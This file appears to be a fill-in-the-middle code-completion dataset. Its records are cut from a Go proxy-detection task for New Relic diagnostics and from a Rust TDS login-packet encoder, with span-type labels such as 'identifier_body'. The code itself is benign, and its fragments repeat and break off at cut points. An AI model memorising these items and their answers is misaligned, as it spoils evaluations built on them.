log.Debug("Setting proxy via detected config to", proxyURL)
return proxyURL
}
func findProxyValuesFromEnvVars(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectEnvVars"].Status == tasks.Info {
envVars, ok := upstream["Base/Env/CollectEnvVars"].Payload.(map[string]string)
if ok {
for _, proxyEnvVarKey := range proxyEnvVarsKeys {
proxyEnvVarVal, isPresent := envVars[proxyEnvVarKey]
if isPresent {
lowerCaseEnvVar := strings.ToLower(proxyEnvVarKey)
if strings.Contains(lowerCaseEnvVar, "host") {
proxyConfig.proxyHost = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "port") {
proxyConfig.proxyPort = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "user") {
proxyConfig.proxyUser = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "pass") { //should match pass or password
proxyConfig.proxyPassword = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "scheme") {
proxyConfig.proxyScheme = proxyEnvVarVal
} else {
proxyConfig.proxyURL = proxyEnvVarVal
}
}
}
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = "New Relic Environment variables"
}
}
}
return proxyConfig
}
func findProxyValuesFromSysProps(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectSysProps"].Status == tasks.Info {
processes, ok := upstream["Base/Env/CollectSysProps"].
|
{
return proxy.proxyURL
}
|
conditional_block
|
proxyDetect.go
|
auth key "proxyAuth".
var minionProxyKeys = ProxyConfig{
proxyHost: "proxy",
proxyUser: "proxyAuth",
}
var phpProxyKeys = ProxyConfig{
proxyHost: "newrelic.daemon.proxy",
}
var httpsProxyKeys = []string{
"HTTP_PROXY",
"HTTPS_PROXY",
}
// BaseConfigProxyDetect - Primary task to search for and find config file. Will optionally take command line input as source
type BaseConfigProxyDetect struct {
}
// Identifier - This returns the Category, Subcategory and Name of each task
func (p BaseConfigProxyDetect) Identifier() tasks.Identifier {
return tasks.IdentifierFromString("Base/Config/ProxyDetect")
}
// Explain - Returns the help text for each individual task
func (p BaseConfigProxyDetect) Explain() string {
return "Determine and use configured proxy for New Relic agent"
}
// Dependencies - Returns the tasks that must run before this one
func (p BaseConfigProxyDetect) Dependencies() []string {
// depends on config validation plus collected env vars and system properties
return []string{
"Base/Config/Validate",
"Base/Env/CollectEnvVars",
"Base/Env/CollectSysProps",
}
}
// Execute - This task will search for config files based on the string array defined and walk the directory tree from the working directory searching for additional matches
func (p BaseConfigProxyDetect) Execute(options tasks.Options, upstream map[string]tasks.Result) tasks.Result {
//check if the customer has http_proxy or https_proxy in their environment. If they don't, later we'll set the env var using the proxy values found via newrelic proxy settings; this env var will allow us to connect nrdiag to newrelic and upload their data into a ticket
httpsProxyKey, httpsProxyVal := checkForHttpORHttpsProxies()
validations, ok := upstream["Base/Config/Validate"].Payload.([]ValidateElement) //data coming from config files found
if ok {
proxyConfig, multipleProxyErr := getProxyConfig(validations, options, upstream)
if multipleProxyErr != nil {
return tasks.Result{
Status: tasks.Warning,
Summary: "We had difficulties retrieving proxy settings from your New Relic config file: " + multipleProxyErr.Error(),
Payload: proxyConfig,
}
}
if (proxyConfig != ProxyConfig{}) {
proxyURL := ""
if (proxyConfig.proxyHost != "") || (proxyConfig.proxyURL != "") {
proxyURL = proxyURL + setProxyURL(proxyConfig)
}
if httpsProxyKey == "" {
os.Setenv("HTTP_PROXY", proxyURL) //Set this env var temporarily to be used by: https://github.com/newrelic/newrelic-diagnostics-cli/blob/main/processOptions.go#L39
}
log.Debug(proxyConfig)
return tasks.Result{
Status: tasks.Success,
Summary: fmt.Sprintf("We have successfully detected a proxy URL set %s via New Relic proxy settings using %s\n", proxyURL, proxyConfig.proxySource),
Payload: proxyConfig,
}
}
}
if httpsProxyKey != "" {
return tasks.Result{
Status: tasks.Warning,
Summary: fmt.Sprintf("We have detected a proxy set via %s: %s\nThough this may be a valid configuration for your app and is supported by New Relic Infinite Tracing, keep in mind that New Relic agents support their own specific proxy settings.", httpsProxyKey, httpsProxyVal),
URL: "https://docs.newrelic.com/docs/using-new-relic/cross-product-functions/install-configure/configure-agent",
}
}
return tasks.Result{
Status: tasks.None,
Summary: "No proxy server settings found for this app",
}
}
func checkForHttpORHttpsProxies() (string, string) {
for _, httpsProxyKey := range httpsProxyKeys {
httpsProxyVal := os.Getenv(httpsProxyKey)
if httpsProxyVal != "" {
return httpsProxyKey, httpsProxyVal
}
}
return "", ""
}
func getProxyConfig(validations []ValidateElement, options tasks.Options, upstream map[string]tasks.Result) (ProxyConfig, error) {
proxyConfig := findProxyValuesFromEnvVars(upstream)
for _, validation := range validations { // Go through each config file validation to see if the proxy is configured anywhere in there, or at least find out which agent we are dealing with based on the file extension
if filepath.Ext(validation.Config.FileName) != ".ini" && (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because env vars take precedence for all agents except python. PHP does not use env vars
}
if filepath.Ext(validation.Config.FileName) == ".yml" && (validation.Config.FileName != "newrelic-infra.yml") {
//applicable only to Java not Ruby:
proxyConfig := findProxyValuesFromSysProps(upstream)
if (proxyConfig != ProxyConfig{}) {
return proxyConfig, nil //early exit because system properties take precedence over config file
}
//Check for proxy values in yml file, applicable to both Java and Ruby
proxyConfig = findProxyValuesFromYmlFile(validation, options)
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = validation.Config.FilePath + validation.Config.FileName
}
return proxyConfig, nil
}
// now let's look into infra, .NET, PHP, minion and other standard settings
for _, proxyConfigKeys := range nrProxyConfigs {
proxyConfig, multipleProxyConfigs := findProxyValuesFromConfigFile(proxyConfigKeys, validation)
log.Debug("ProxyConfig found through config file: ", proxyConfig)
log.Debug("Detected multipleProxyConfigs: ", multipleProxyConfigs)
if proxyConfig.proxyHost != "" {
return proxyConfig, nil //return as soon as we have a match
}
if len(multipleProxyConfigs) > 1 {
return proxyConfig, errors.New("multiple proxy values found within a config File")
}
}
} // end of iterating through config validations
return proxyConfig, nil
}
func setProxyURL(proxy ProxyConfig) string {
//this single setting is only available for a couple of agents and it overwrites other proxy settings
if proxy.proxyURL != "" {
return proxy.proxyURL
}
//build the URL by putting together all the proxy setting values they have used
var proxyURL string
if proxy.proxyUser != "" {
proxyURL += proxy.proxyUser
//No password found case for combined auth in single key (e.g. private minion's proxyAuth)
if proxy.proxyPassword != "" {
proxyURL += ":" + proxy.proxyPassword
}
proxyURL += "@"
}
proxyURL += proxy.proxyHost
if proxy.proxyPort != "" {
proxyURL += ":" + proxy.proxyPort
}
//Some customers will prepend a protocol to their host configuration, so we want to avoid building a URL such as this one: http://https://myuser:mypassword@myproxy.mycompany.com:8080
if strings.Contains(proxyURL, "http") {
return proxyURL
}
if proxy.proxyScheme != "" { //setting option only for python and java
proxyURL = proxy.proxyScheme + "://" + proxyURL
return proxyURL
}
//default to http
proxyURL = "http://" + proxyURL
log.Debug("Setting proxy via detected config to", proxyURL)
return proxyURL
}
func findProxyValuesFromEnvVars(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectEnvVars"].Status == tasks.Info {
envVars, ok := upstream["Base/Env/CollectEnvVars"].Payload.(map[string]string)
if ok {
for _, proxyEnvVarKey := range proxyEnvVarsKeys {
proxyEnvVarVal, isPresent := envVars[proxyEnvVarKey]
if isPresent {
lowerCaseEnvVar := strings.ToLower(proxyEnvVarKey)
if strings.Contains(lowerCaseEnvVar, "host") {
proxyConfig.proxyHost = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "port") {
proxyConfig.proxyPort = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "user") {
proxyConfig.proxyUser = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "pass") { //should match pass or password
proxyConfig.proxyPassword = proxyEnvVarVal
} else if strings.Contains(lowerCaseEnvVar, "scheme") {
proxyConfig.proxyScheme = proxyEnvVarVal
} else {
proxyConfig.proxyURL = proxyEnvVarVal
}
}
}
if (proxyConfig != ProxyConfig{}) {
proxyConfig.proxySource = "New Relic Environment variables"
}
}
}
return proxyConfig
}
func findProxyValuesFromSysProps(upstream map[string]tasks.Result) ProxyConfig {
proxyConfig := ProxyConfig{}
if upstream["Base/Env/CollectSysProps"].Status == tasks.Info {
processes, ok := upstream["Base/Env/CollectSysProps"].Payload.([]tasks.ProcIDSysProps)
|
random_line_split
|
||
login.rs
|
003,
/// 2012, 2014, 2016
SqlServerN = 0x74000004,
}
}
bitflags! {
pub struct LoginOptionFlags1: u8 {
const BIG_ENDIAN = 0b00000001;
/// Charset_EBDDIC, default/bit not set = Charset_ASCII
const CHARSET_EBDDIC = 0b00000010;
/// default float is IEEE_754
const FLOAT_VAX = 0b00000100;
const FLOAT_ND5000 = 0b00001000;
const DUMPLOAD_ON = 0b00010000;
/// Set if the client requires warning messages on execution of the USE SQL
/// statement. If this flag is NOT SET, the server MUST NOT inform the client when the database
/// changes, and therefore the client will be unaware of any accompanying collation changes.
const USE_DB_NOTIFY = 0b00100000;
/// Set if the change to initial database needs to succeed if the connection is to succeed. (false: warn)
const INITIAL_DB_FATAL = 0b01000000;
/// Set if the client requires warning messages on execution of a language change statement.
const LANG_CHANGE_WARN = 0b10000000;
}
}
bitflags! {
pub struct LoginOptionFlags2: u8 {
/// Set if the change to initial language needs to succeed if the connect is to succeed.
const INIT_LANG_FATAL = 0b00000001;
/// Set if the client is the ODBC driver. This causes the server to set ANSI_DEFAULTS=ON,
/// CURSOR_CLOSE_ON_COMMIT, IMPLICIT_TRANSACTIONS=OFF, TEXTSIZE=0x7FFFFFFF (2GB) (TDS 7.2 and earlier)
/// TEXTSIZE to infinite (TDS 7.3), and ROWCOUNT to infinite
/// (2.2.6.4)
const ODBC_DRIVER = 0b00000010;
const TRANS_BOUNDARY = 0b00000100;
const CACHE_CONNECT = 0b00001000;
/// reserved
const USER_TYPE_SERVER = 0b00010000;
/// Distributed Query login
const USER_TYPE_REM_USER = 0b00100000;
/// Replication login
const USER_TYPE_SQL_REPL = 0b00110000;
const INTEGRATED_SECURITY = 0b10000000;
}
}
bitflags! {
pub struct LoginTypeFlags: u8 {
/// use TSQL instead of DFLT
const SQL_TSQL = 0b00000001;
/// Set if the client is the OLEDB driver. This causes the server to set ANSI_DEFAULTS to ON ...
const OLEDB_DRIVER = 0b00010000;
const READ_ONLY_INTENT = 0b00100000;
}
}
bitflags! {
pub struct LoginOptionFlags3: u8 {
const REQUEST_CHANGE_PWD = 0b00000001;
/// 1 if XML data type instances are returned as binary XML
const SEND_YUKON_BINARY = 0b00000010;
/// 1 if client is requesting separate process to be spawned as user instance
const SPAWN_USER_INSTANCE = 0b00000100;
/// 0 = The server MUST restrict the collations sent to a specific set of collations.
/// 1 = The server MAY send any collation that fits in the storage space.
const SUPPORT_UNKNOWN_COLL = 0b00001000;
// TODO: fExtension?
}
}
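// Illustrative sketch: these option sets are ordinary bitflags, so a client builds its login
// options by OR-ing variants together and can test them with `contains`.
fn example_login_flags() -> (LoginOptionFlags1, LoginOptionFlags2) {
    let flags1 = LoginOptionFlags1::USE_DB_NOTIFY | LoginOptionFlags1::INITIAL_DB_FATAL;
    let flags2 = LoginOptionFlags2::INIT_LANG_FATAL | LoginOptionFlags2::ODBC_DRIVER;
    debug_assert!(flags1.contains(LoginOptionFlags1::USE_DB_NOTIFY));
    (flags1, flags2)
}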
impl FeatureLevel {
pub fn done_row_count_bytes(self) -> u8
|
}
/// the login packet
pub struct LoginMessage<'a> {
/// the highest TDS version the client supports
pub tds_version: FeatureLevel,
/// the requested packet size
pub packet_size: u32,
/// the version of the interface library
pub client_prog_ver: u32,
/// the process id of the client application
pub client_pid: u32,
/// the connection id of the primary server
/// (used when connecting to an "Always UP" backup server)
pub connection_id: u32,
pub option_flags_1: LoginOptionFlags1,
pub option_flags_2: LoginOptionFlags2,
/// flag included in option_flags_2
pub integrated_security: Option<Vec<u8>>,
pub type_flags: LoginTypeFlags,
pub option_flags_3: LoginOptionFlags3,
pub client_timezone: i32,
pub client_lcid: u32,
pub hostname: Cow<'a, str>,
pub username: Cow<'a, str>,
pub password: Cow<'a, str>,
pub app_name: Cow<'a, str>,
pub server_name: Cow<'a, str>,
/// the default database to connect to
pub db_name: Cow<'a, str>,
}
impl<'a> LoginMessage<'a> {
pub fn new() -> LoginMessage<'a> {
LoginMessage {
tds_version: FeatureLevel::SqlServerN,
packet_size: 4096,
client_prog_ver: 0,
client_pid: 0,
connection_id: 0,
option_flags_1: LoginOptionFlags1::USE_DB_NOTIFY | LoginOptionFlags1::INITIAL_DB_FATAL,
option_flags_2: LoginOptionFlags2::INIT_LANG_FATAL | LoginOptionFlags2::ODBC_DRIVER,
integrated_security: None,
type_flags: LoginTypeFlags::empty(),
option_flags_3: LoginOptionFlags3::SUPPORT_UNKNOWN_COLL,
client_timezone: 0, //TODO
client_lcid: 0, // TODO
hostname: "".into(),
username: "".into(),
password: "".into(),
app_name: "".into(),
server_name: "".into(),
db_name: "".into(),
}
}
}
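// Illustrative sketch: a caller starts from the defaults of `LoginMessage::new()` and fills in
// the connection-specific fields before encoding; the credentials and names here are placeholders.
fn example_login_message() -> LoginMessage<'static> {
    let mut login = LoginMessage::new();
    login.hostname = "client-host".into();
    login.username = "sa".into();
    login.password = "secret".into();
    login.app_name = "example-app".into();
    login.server_name = "localhost".into();
    login.db_name = "master".into();
    login
}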
impl<'a> Encode<BytesMut> for LoginMessage<'a> {
fn encode(self, dst: &mut BytesMut) -> crate::Result<()> {
let mut cursor = Cursor::new(Vec::with_capacity(512));
// Space for the length
cursor.write_u32::<LittleEndian>(0)?;
// ignore the specified value for integrated security since we determine that by the struct field
let option_flags2 = if self.integrated_security.is_some() {
self.option_flags_2 | LoginOptionFlags2::INTEGRATED_SECURITY
} else {
self.option_flags_2 & !LoginOptionFlags2::INTEGRATED_SECURITY
};
cursor.write_u32::<LittleEndian>(self.tds_version as u32)?;
cursor.write_u32::<LittleEndian>(self.packet_size)?;
cursor.write_u32::<LittleEndian>(self.client_prog_ver)?;
cursor.write_u32::<LittleEndian>(self.client_pid)?;
cursor.write_u32::<LittleEndian>(self.connection_id)?;
cursor.write_u8(self.option_flags_1.bits())?;
cursor.write_u8(option_flags2.bits())?;
cursor.write_u8(self.type_flags.bits())?;
cursor.write_u8(self.option_flags_3.bits())?;
cursor.write_u32::<LittleEndian>(self.client_timezone as u32)?;
cursor.write_u32::<LittleEndian>(self.client_lcid)?;
// variable length data (OffsetLength)
let var_data = [
&self.hostname,
&self.username,
&self.password,
&self.app_name,
&self.server_name,
&"".into(), // 5. ibExtension
&"".into(), // ibCltIntName
&"".into(), // ibLanguage
&self.db_name,
&"".into(), // 9. ClientId (6 bytes); this is included in var_data so we don't lack the bytes of cbSspiLong (4=2*2) and can insert it at the correct position
&"".into(), // 10. ibSSPI
&"".into(), // ibAtchDBFile
&"".into(), // ibChangePassword
];
let mut data_offset = cursor.position() as usize + var_data.len() * 2 * 2 + 6;
for (i, value) in var_data.iter().enumerate() {
// write the client ID (created from the MAC address)
if i == 9 {
cursor.write_u32::<LittleEndian>(0)?; //TODO:
cursor.write_u16::<LittleEndian>(42)?; //TODO: generate real client
|
{
if self as u8 >= FeatureLevel::SqlServer2005 as u8 {
8
} else {
4
}
}
|
identifier_body
|
login.rs
|
00000010;
/// default float is IEEE_754
const FLOAT_VAX = 0b00000100;
const FLOAT_ND5000 = 0b00001000;
const DUMPLOAD_ON = 0b00010000;
/// Set if the client requires warning messages on execution of the USE SQL
/// statement. If this flag is NOT SET, the server MUST NOT inform the client when the database
/// changes, and therefore the client will be unaware of any accompanying collation changes.
const USE_DB_NOTIFY = 0b00100000;
/// Set if the change to initial database needs to succeed if the connection is to succeed. (false: warn)
const INITIAL_DB_FATAL = 0b01000000;
/// Set if the client requires warning messages on execution of a language change statement.
const LANG_CHANGE_WARN = 0b10000000;
}
}
bitflags! {
pub struct LoginOptionFlags2: u8 {
/// Set if the change to initial language needs to succeed if the connect is to succeed.
const INIT_LANG_FATAL = 0b00000001;
/// Set if the client is the ODBC driver. This causes the server to set ANSI_DEFAULTS=ON,
/// CURSOR_CLOSE_ON_COMMIT, IMPLICIT_TRANSACTIONS=OFF, TEXTSIZE=0x7FFFFFFF (2GB) (TDS 7.2 and earlier)
/// TEXTSIZE to infinite (TDS 7.3), and ROWCOUNT to infinite
/// (2.2.6.4)
const ODBC_DRIVER = 0b00000010;
const TRANS_BOUNDARY = 0b00000100;
const CACHE_CONNECT = 0b00001000;
/// reserved
const USER_TYPE_SERVER = 0b00010000;
/// Distributed Query login
const USER_TYPE_REM_USER = 0b00100000;
/// Replication login
const USER_TYPE_SQL_REPL = 0b00110000;
const INTEGRATED_SECURITY = 0b10000000;
}
}
bitflags! {
pub struct LoginTypeFlags: u8 {
/// use TSQL instead of DFLT
const SQL_TSQL = 0b00000001;
/// Set if the client is the OLEDB driver. This causes the server to set ANSI_DEFAULTS to ON ...
const OLEDB_DRIVER = 0b00010000;
const READ_ONLY_INTENT = 0b00100000;
}
}
bitflags! {
pub struct LoginOptionFlags3: u8 {
const REQUEST_CHANGE_PWD = 0b00000001;
/// 1 if XML data type instances are returned as binary XML
const SEND_YUKON_BINARY = 0b00000010;
/// 1 if client is requesting separate process to be spawned as user instance
const SPAWN_USER_INSTANCE = 0b00000100;
/// 0 = The server MUST restrict the collations sent to a specific set of collations.
/// 1 = The server MAY send any collation that fits in the storage space.
const SUPPORT_UNKNOWN_COLL = 0b00001000;
// TODO: fExtension?
}
}
impl FeatureLevel {
pub fn done_row_count_bytes(self) -> u8 {
if self as u8 >= FeatureLevel::SqlServer2005 as u8 {
8
} else {
4
}
}
}
/// the login packet
pub struct LoginMessage<'a> {
/// the highest TDS version the client supports
pub tds_version: FeatureLevel,
/// the requested packet size
pub packet_size: u32,
/// the version of the interface library
pub client_prog_ver: u32,
/// the process id of the client application
pub client_pid: u32,
/// the connection id of the primary server
/// (used when connecting to an "Always UP" backup server)
pub connection_id: u32,
pub option_flags_1: LoginOptionFlags1,
pub option_flags_2: LoginOptionFlags2,
/// flag included in option_flags_2
pub integrated_security: Option<Vec<u8>>,
pub type_flags: LoginTypeFlags,
pub option_flags_3: LoginOptionFlags3,
pub client_timezone: i32,
pub client_lcid: u32,
pub hostname: Cow<'a, str>,
pub username: Cow<'a, str>,
pub password: Cow<'a, str>,
pub app_name: Cow<'a, str>,
pub server_name: Cow<'a, str>,
/// the default database to connect to
pub db_name: Cow<'a, str>,
}
impl<'a> LoginMessage<'a> {
pub fn new() -> LoginMessage<'a> {
LoginMessage {
tds_version: FeatureLevel::SqlServerN,
packet_size: 4096,
client_prog_ver: 0,
client_pid: 0,
connection_id: 0,
option_flags_1: LoginOptionFlags1::USE_DB_NOTIFY | LoginOptionFlags1::INITIAL_DB_FATAL,
option_flags_2: LoginOptionFlags2::INIT_LANG_FATAL | LoginOptionFlags2::ODBC_DRIVER,
integrated_security: None,
type_flags: LoginTypeFlags::empty(),
option_flags_3: LoginOptionFlags3::SUPPORT_UNKNOWN_COLL,
client_timezone: 0, //TODO
client_lcid: 0, // TODO
hostname: "".into(),
username: "".into(),
password: "".into(),
app_name: "".into(),
server_name: "".into(),
db_name: "".into(),
}
}
}
impl<'a> Encode<BytesMut> for LoginMessage<'a> {
fn encode(self, dst: &mut BytesMut) -> crate::Result<()> {
let mut cursor = Cursor::new(Vec::with_capacity(512));
// Space for the length
cursor.write_u32::<LittleEndian>(0)?;
// ignore the specified value for integrated security since we determine that by the struct field
let option_flags2 = if self.integrated_security.is_some() {
self.option_flags_2 | LoginOptionFlags2::INTEGRATED_SECURITY
} else {
self.option_flags_2 & !LoginOptionFlags2::INTEGRATED_SECURITY
};
cursor.write_u32::<LittleEndian>(self.tds_version as u32)?;
cursor.write_u32::<LittleEndian>(self.packet_size)?;
cursor.write_u32::<LittleEndian>(self.client_prog_ver)?;
cursor.write_u32::<LittleEndian>(self.client_pid)?;
cursor.write_u32::<LittleEndian>(self.connection_id)?;
cursor.write_u8(self.option_flags_1.bits())?;
cursor.write_u8(option_flags2.bits())?;
cursor.write_u8(self.type_flags.bits())?;
cursor.write_u8(self.option_flags_3.bits())?;
cursor.write_u32::<LittleEndian>(self.client_timezone as u32)?;
cursor.write_u32::<LittleEndian>(self.client_lcid)?;
// variable length data (OffsetLength)
let var_data = [
&self.hostname,
&self.username,
&self.password,
&self.app_name,
&self.server_name,
&"".into(), // 5. ibExtension
&"".into(), // ibCltIntName
&"".into(), // ibLanguage
&self.db_name,
&"".into(), // 9. ClientId (6 bytes); this is included in var_data so we don't lack the bytes of cbSspiLong (4=2*2) and can insert it at the correct position
&"".into(), // 10. ibSSPI
&"".into(), // ibAtchDBFile
&"".into(), // ibChangePassword
];
let mut data_offset = cursor.position() as usize + var_data.len() * 2 * 2 + 6;
for (i, value) in var_data.iter().enumerate() {
// write the client ID (created from the MAC address)
if i == 9 {
cursor.write_u32::<LittleEndian>(0)?; //TODO:
cursor.write_u16::<LittleEndian>(42)?; //TODO: generate real client id
continue;
}
cursor.write_u16::<LittleEndian>(data_offset as u16)?;
// ibSSPI
if i == 10 {
let length = if let Some(ref bytes) = self.integrated_security {
let bak = cursor.position();
cursor.set_position(data_offset as u64);
cursor.write_all(bytes)?;
data_offset += bytes.len();
cursor.set_position(bak);
bytes.len()
} else
|
{
0
}
|
conditional_block
|
|
login.rs
|
003,
/// 2012, 2014, 2016
SqlServerN = 0x74000004,
}
}
bitflags! {
pub struct LoginOptionFlags1: u8 {
const BIG_ENDIAN = 0b00000001;
/// Charset_EBDDIC, default/bit not set = Charset_ASCII
const CHARSET_EBDDIC = 0b00000010;
/// default float is IEEE_754
const FLOAT_VAX = 0b00000100;
const FLOAT_ND5000 = 0b00001000;
const DUMPLOAD_ON = 0b00010000;
/// Set if the client requires warning messages on execution of the USE SQL
/// statement. If this flag is NOT SET, the server MUST NOT inform the client when the database
/// changes, and therefore the client will be unaware of any accompanying collation changes.
const USE_DB_NOTIFY = 0b00100000;
/// Set if the change to initial database needs to succeed if the connection is to succeed. (false: warn)
const INITIAL_DB_FATAL = 0b01000000;
/// Set if the client requires warning messages on execution of a language change statement.
const LANG_CHANGE_WARN = 0b10000000;
}
}
bitflags! {
pub struct LoginOptionFlags2: u8 {
/// Set if the change to initial language needs to succeed if the connect is to succeed.
const INIT_LANG_FATAL = 0b00000001;
/// Set if the client is the ODBC driver. This causes the server to set ANSI_DEFAULTS=ON,
/// CURSOR_CLOSE_ON_COMMIT, IMPLICIT_TRANSACTIONS=OFF, TEXTSIZE=0x7FFFFFFF (2GB) (TDS 7.2 and earlier)
/// TEXTSIZE to infinite (TDS 7.3), and ROWCOUNT to infinite
/// (2.2.6.4)
const ODBC_DRIVER = 0b00000010;
const TRANS_BOUNDARY = 0b00000100;
const CACHE_CONNECT = 0b00001000;
/// reserved
const USER_TYPE_SERVER = 0b00010000;
/// Distributed Query login
const USER_TYPE_REM_USER = 0b00100000;
/// Replication login
const USER_TYPE_SQL_REPL = 0b00110000;
const INTEGRATED_SECURITY = 0b10000000;
}
}
bitflags! {
pub struct LoginTypeFlags: u8 {
/// use TSQL instead of DFLT
const SQL_TSQL = 0b00000001;
/// Set if the client is the OLEDB driver. This causes the server to set ANSI_DEFAULTS to ON ...
const OLEDB_DRIVER = 0b00010000;
const READ_ONLY_INTENT = 0b00100000;
}
}
bitflags! {
pub struct LoginOptionFlags3: u8 {
const REQUEST_CHANGE_PWD = 0b00000001;
/// 1 if XML data type instances are returned as binary XML
const SEND_YUKON_BINARY = 0b00000010;
/// 1 if client is requesting separate process to be spawned as user instance
const SPAWN_USER_INSTANCE = 0b00000100;
/// 0 = The server MUST restrict the collations sent to a specific set of collations.
/// 1 = The server MAY send any collation that fits in the storage space.
const SUPPORT_UNKNOWN_COLL = 0b00001000;
// TODO: fExtension?
}
}
impl FeatureLevel {
pub fn
|
(self) -> u8 {
if self as u8 >= FeatureLevel::SqlServer2005 as u8 {
8
} else {
4
}
}
}
/// the login packet
pub struct LoginMessage<'a> {
/// the highest TDS version the client supports
pub tds_version: FeatureLevel,
/// the requested packet size
pub packet_size: u32,
/// the version of the interface library
pub client_prog_ver: u32,
/// the process id of the client application
pub client_pid: u32,
/// the connection id of the primary server
/// (used when connecting to an "Always UP" backup server)
pub connection_id: u32,
pub option_flags_1: LoginOptionFlags1,
pub option_flags_2: LoginOptionFlags2,
/// flag included in option_flags_2
pub integrated_security: Option<Vec<u8>>,
pub type_flags: LoginTypeFlags,
pub option_flags_3: LoginOptionFlags3,
pub client_timezone: i32,
pub client_lcid: u32,
pub hostname: Cow<'a, str>,
pub username: Cow<'a, str>,
pub password: Cow<'a, str>,
pub app_name: Cow<'a, str>,
pub server_name: Cow<'a, str>,
/// the default database to connect to
pub db_name: Cow<'a, str>,
}
impl<'a> LoginMessage<'a> {
pub fn new() -> LoginMessage<'a> {
LoginMessage {
tds_version: FeatureLevel::SqlServerN,
packet_size: 4096,
client_prog_ver: 0,
client_pid: 0,
connection_id: 0,
option_flags_1: LoginOptionFlags1::USE_DB_NOTIFY | LoginOptionFlags1::INITIAL_DB_FATAL,
option_flags_2: LoginOptionFlags2::INIT_LANG_FATAL | LoginOptionFlags2::ODBC_DRIVER,
integrated_security: None,
type_flags: LoginTypeFlags::empty(),
option_flags_3: LoginOptionFlags3::SUPPORT_UNKNOWN_COLL,
client_timezone: 0, //TODO
client_lcid: 0, // TODO
hostname: "".into(),
username: "".into(),
password: "".into(),
app_name: "".into(),
server_name: "".into(),
db_name: "".into(),
}
}
}
impl<'a> Encode<BytesMut> for LoginMessage<'a> {
fn encode(self, dst: &mut BytesMut) -> crate::Result<()> {
let mut cursor = Cursor::new(Vec::with_capacity(512));
// Space for the length
cursor.write_u32::<LittleEndian>(0)?;
// ignore the specified value for integrated security since we determine that by the struct field
let option_flags2 = if self.integrated_security.is_some() {
self.option_flags_2 | LoginOptionFlags2::INTEGRATED_SECURITY
} else {
self.option_flags_2 & !LoginOptionFlags2::INTEGRATED_SECURITY
};
cursor.write_u32::<LittleEndian>(self.tds_version as u32)?;
cursor.write_u32::<LittleEndian>(self.packet_size)?;
cursor.write_u32::<LittleEndian>(self.client_prog_ver)?;
cursor.write_u32::<LittleEndian>(self.client_pid)?;
cursor.write_u32::<LittleEndian>(self.connection_id)?;
cursor.write_u8(self.option_flags_1.bits())?;
cursor.write_u8(option_flags2.bits())?;
cursor.write_u8(self.type_flags.bits())?;
cursor.write_u8(self.option_flags_3.bits())?;
cursor.write_u32::<LittleEndian>(self.client_timezone as u32)?;
cursor.write_u32::<LittleEndian>(self.client_lcid)?;
// variable length data (OffsetLength)
let var_data = [
&self.hostname,
&self.username,
&self.password,
&self.app_name,
&self.server_name,
&"".into(), // 5. ibExtension
&"".into(), // ibCltIntName
&"".into(), // ibLanguage
&self.db_name,
&"".into(), // 9. ClientId (6 bytes); this is included in var_data so we don't lack the bytes of cbSspiLong (4=2*2) and can insert it at the correct position
&"".into(), // 10. ibSSPI
&"".into(), // ibAtchDBFile
&"".into(), // ibChangePassword
];
let mut data_offset = cursor.position() as usize + var_data.len() * 2 * 2 + 6;
for (i, value) in var_data.iter().enumerate() {
// write the client ID (created from the MAC address)
if i == 9 {
cursor.write_u32::<LittleEndian>(0)?; //TODO:
cursor.write_u16::<LittleEndian>(42)?; //TODO: generate real client id
|
done_row_count_bytes
|
identifier_name
|
login.rs
|
6
SqlServerN = 0x74000004,
}
}
bitflags! {
pub struct LoginOptionFlags1: u8 {
const BIG_ENDIAN = 0b00000001;
/// Charset_EBDDIC, default/bit not set = Charset_ASCII
const CHARSET_EBDDIC = 0b00000010;
/// default float is IEEE_754
const FLOAT_VAX = 0b00000100;
const FLOAT_ND5000 = 0b00001000;
const DUMPLOAD_ON = 0b00010000;
/// Set if the client requires warning messages on execution of the USE SQL
/// statement. If this flag is NOT SET, the server MUST NOT inform the client when the database
/// changes, and therefore the client will be unaware of any accompanying collation changes.
const USE_DB_NOTIFY = 0b00100000;
/// Set if the change to initial database needs to succeed if the connection is to succeed. (false: warn)
const INITIAL_DB_FATAL = 0b01000000;
/// Set if the client requires warning messages on execution of a language change statement.
const LANG_CHANGE_WARN = 0b10000000;
}
}
bitflags! {
pub struct LoginOptionFlags2: u8 {
/// Set if the change to initial language needs to succeed if the connect is to succeed.
const INIT_LANG_FATAL = 0b00000001;
/// Set if the client is the ODBC driver. This causes the server to set ANSI_DEFAULTS=ON,
/// CURSOR_CLOSE_ON_COMMIT, IMPLICIT_TRANSACTIONS=OFF, TEXTSIZE=0x7FFFFFFF (2GB) (TDS 7.2 and earlier)
/// TEXTSIZE to infinite (TDS 7.3), and ROWCOUNT to infinite
/// (2.2.6.4)
const ODBC_DRIVER = 0b00000010;
const TRANS_BOUNDARY = 0b00000100;
const CACHE_CONNECT = 0b00001000;
/// reserved
const USER_TYPE_SERVER = 0b00010000;
/// Distributed Query login
const USER_TYPE_REM_USER = 0b00100000;
/// Replication login
const USER_TYPE_SQL_REPL = 0b00110000;
const INTEGRATED_SECURITY = 0b10000000;
}
}
bitflags! {
pub struct LoginTypeFlags: u8 {
/// use TSQL instead of DFLT
const SQL_TSQL = 0b00000001;
/// Set if the client is the OLEDB driver. This causes the server to set ANSI_DEFAULTS to ON ...
const OLEDB_DRIVER = 0b00010000;
const READ_ONLY_INTENT = 0b00100000;
}
}
bitflags! {
pub struct LoginOptionFlags3: u8 {
const REQUEST_CHANGE_PWD = 0b00000001;
/// 1 if XML data type instances are returned as binary XML
const SEND_YUKON_BINARY = 0b00000010;
/// 1 if client is requesting separate process to be spawned as user instance
const SPAWN_USER_INSTANCE = 0b00000100;
